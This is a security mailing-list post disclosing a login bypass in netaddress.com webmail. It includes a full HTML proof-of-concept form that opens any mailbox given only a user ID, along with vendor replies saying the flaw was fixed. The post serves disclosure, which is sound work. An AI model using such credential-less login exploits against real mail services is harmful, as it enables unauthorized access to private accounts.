Netaddress Secutity issue solved

["syed mohamed" <syedblr () hotmail com>]

Hi,

Vulnerable
==========
netaddress.com mailing service

This mail is Continuation of the previous mails i sent regarding security 
flaw in netaddress.com, which will open anybody's mailbox with out password.

i got a mail with attached html page. which is nothing but saved html home 
page of netaddress.com(old one).Itz old home page design. when i submit the 
form without password it opened the mail box. Yes it opens every mail box 
without password. All you need is valid netaddress id.

Problem:

While submitting the login form to /tpl/Door/Login it needs just only three 
parameters maidid, domainid(value=4), domain(value=usa.net). Create a html 
file which contains all the three parameters. sumit the form to 
http://netaddress.com//tpl/door/login . Note that give double slash after 
neraddress.com. while i tried with single slash it didn`t work.

Here is the Exploit code(save this as html and run it in local. Submit only 
with userid)

Exploit Code:

<html>
<form name="loginform"
             action="http://classic.netaddress.com//tpl/Door/LoginPost"; 
method="POST" target=_blank>
<input type="hidden" name="LoginState" value="2">

           <input type="hidden" name="DomainID" value="4">
            <input type="hidden" name="Domain" value="usa.net">


<b><font color="#FF0000" size="2" face="Arial">Netaddress Security hole - 
Demo</font></b><font face="Arial" size="2"><br>
<br>
Developed By Syed Mohamed (<a 
href="mailto:syedblr () hotmail com">syedblr () hotmail com</a>)<br>
<br>
Just Enter Login ID (enter example if netaddress id is 
example () usa net)</font>
<p>


<input type="text" size="16" name="UserID"
              value="">
<input type="submit" value="Login">
</form>
</p>
</html>

I hv informed the issue to usa.net.( i had only abuse and postmaster id of 
usa.net.. info id bounced back) ook 3 hrs to solve this issue.
Now they hv solved the issue.

Vendor's response:
==================
First Response:
===============
Thank you for your notification.  We are addressing this issue.

Regards,
USA.NET, Inc.

Second Response:
================
Dear Sir/Madam,

USA.NET’s technical and security teams have been made aware of this issue
and it has been corrected.  We appreciate your patience as we strive to
bring you the most robust email solution possible.

Regards,
Abuse Dept.
abuse () usa net
USA.Net, Inc.


Third Respose:
=============
Yes, this problem has been corrected.

Thank you for your assistance,

USA.NET, Inc.

Thankx to usa.net for responding with great speed


Thankx to my friend Thejaswini who forwarded the old netaddress html page.

Regards
Syed Mohamed
syedblr () hotmail com
(Wanna defeat hackers..think like a hacker.. work like a secutity expert)


_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp